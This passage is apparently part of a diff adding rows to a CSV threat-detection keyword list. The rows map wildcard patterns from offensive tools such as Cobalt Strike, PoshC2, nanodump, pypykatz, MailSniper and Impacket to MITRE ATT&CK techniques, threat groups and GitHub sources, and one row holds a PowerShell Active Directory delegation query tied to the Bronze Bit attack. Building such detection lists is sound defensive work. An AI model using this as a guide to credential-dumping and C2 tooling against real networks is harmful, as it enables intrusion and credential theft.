- T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","545","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" +"*Get_DPAPI_Protected_Files*","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","0","N/A","N/A","8","732","95","2023-10-03T05:27:06Z","2021-09-27T09:12:51Z" +"*get_filezilla_creds.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*get_hijackeable_dllname*","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1467","208","2023-09-04T01:25:27Z","2021-11-10T18:28:15Z" +"*get_implants_all*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*get_injection_techniques*","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1021 - T1021.002 - T1022 - T1032 - T1043 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Apollo/","1","1","N/A","10","10","401","83","2023-08-17T14:46:04Z","2020-11-09T08:05:16Z" 
+"*get_keystrokes.py*","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590","N/A","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/CrackMapExec","1","1","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"*get_list_of_implant_text*","offensive_tool_keyword","FudgeC2","FudgeC2 - a command and control framework designed for team collaboration and post-exploitation activities.","T1021.002 - T1105 - T1059.001 - T1059.003","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/Ziconius/FudgeC2","1","0","N/A","10","10","237","54","2023-05-01T21:13:56Z","2018-09-09T21:05:21Z" +"*get_masterkeys_from_lsass*","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z" +"*get_newimplanturl*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*get_obfucation_string_dict*","offensive_tool_keyword","FudgeC2","FudgeC2 - a command and control framework designed for team collaboration and post-exploitation activities.","T1021.002 - T1105 - T1059.001 - T1059.003","TA0008 - TA0011 - 
TA0002","N/A","N/A","C2","https://github.com/Ziconius/FudgeC2","1","0","N/A","10","10","237","54","2023-05-01T21:13:56Z","2018-09-09T21:05:21Z" +"*get_password_policy.x64.*","offensive_tool_keyword","cobaltstrike","Situational Awareness commands implemented using Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Situational-Awareness-BOF","1","1","N/A","10","10","966","173","2023-09-22T15:51:55Z","2020-07-15T16:21:18Z" +"*get_password_policy.x86.*","offensive_tool_keyword","cobaltstrike","Situational Awareness commands implemented using Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - 
T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Situational-Awareness-BOF","1","1","N/A","10","10","966","173","2023-09-22T15:51:55Z","2020-07-15T16:21:18Z" +"*get_post_ex_pipename_list*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","545","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" +"*get_post_ex_spawnto_x*","offensive_tool_keyword","cobaltstrike","Cobalt 
Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","545","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" +"*get_process_inject_allocator*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - 
TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","545","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" +"*get_process_inject_bof_allocator*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","545","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" +"*get_process_inject_execute*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 
- T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","545","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z"
+"*get_rooot.c*","offensive_tool_keyword","POC","Exploit for CVE-2022-27666","T1550 - T1555 - T1212 - T1558","TA0005","N/A","N/A","Exploitation tools","https://github.com/plummm/CVE-2022-27666","1","1","N/A","N/A","3","203","41","2022-03-28T18:21:00Z","2022-03-23T22:54:28Z"
+"*get_sharpurls*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z"
+"*get_stage_allocator*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - 
T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","545","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z"
+"*get_stage_magic_mz_64*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - 
APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","545","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z"
+"*get_stage_magic_mz_86*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","545","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z"
+"*get_stage_magic_pe*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - 
T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","545","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z"
+"*get_virtual_Hook_address*","offensive_tool_keyword","cobaltstrike","A proof-of-concept Cobalt Strike Reflective Loader which aims to recreate. integrate. and enhance Cobalt Strike's evasion features!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/boku7/BokuLoader","1","1","N/A","10","10","1070","227","2023-09-08T10:09:19Z","2021-08-15T18:17:28Z"
+"*Get_WinPwn_Repo.sh*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z"
+"*Get-AccessTokenWithPRT*","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.","T1114 - T1134.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","1","N/A","N/A","10","2626","554","2022-10-20T08:13:33Z","2016-09-08T00:36:51Z"
+"*Get-AclModificationRights*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z"
+"*Get-ActiveTCPConnections*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Start-MonitorTCPConnections.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z"
+"*Get-ADComputer * -Properties PrincipalsAllowedToDelegateToAccount*","offensive_tool_keyword","powershell","Command to get the list of accounts with PrincipalsAllowedToDelegateToAccount (used to exploit Bronze Bit Attack)","T1003 - T1057 - T1087 - T1482 - T1136","TA0001 - TA0002 - TA0005 - TA0006 - TA0008","N/A","N/A","Reconnaissance","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*Get-ADUsernameFromEWS*","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). 
It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.","T1114 - T1134.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","1","N/A","N/A","10","2626","554","2022-10-20T08:13:33Z","2016-09-08T00:36:51Z"
+"*GetADUsers.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z"
+"*getAggressorClient*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - 
TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A"
+"*getAllUserSpns*","offensive_tool_keyword","ldapdomaindump","Active Directory information dumper via LDAP","T1087 - T1005 - T1016","TA0007","N/A","N/A","Credential Access","https://github.com/dirkjanm/ldapdomaindump","1","1","N/A","N/A","10","970","176","2023-09-06T05:50:30Z","2016-05-24T18:46:56Z"
